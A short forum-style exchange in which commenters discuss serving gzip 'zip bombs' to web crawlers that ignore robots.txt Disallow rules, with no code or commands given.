I think I saw an article recently where someone used the http protocol to serve gzipped content that was specially crafted to explode in size on the receiver side. This could be a good preventative to crawlers as they don't typically have that much space dedicated to each instance.
It’s worth noting that the “zip bomb” was at a resource location specified in the Disallow section of robots.txt, meaning the server specifically told the bot not to go there and it did anyway.
(Not that the parent commenter seems confused, just that it hadn’t been noted.)